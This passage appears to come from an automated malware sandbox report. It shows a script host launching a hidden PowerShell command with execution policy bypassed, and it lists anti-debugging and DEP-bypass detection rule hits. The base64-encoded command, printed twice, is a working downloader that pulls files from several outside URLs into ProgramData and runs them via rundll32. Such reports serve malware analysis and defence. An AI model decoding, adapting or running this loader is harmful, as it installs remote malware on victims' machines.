G4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2A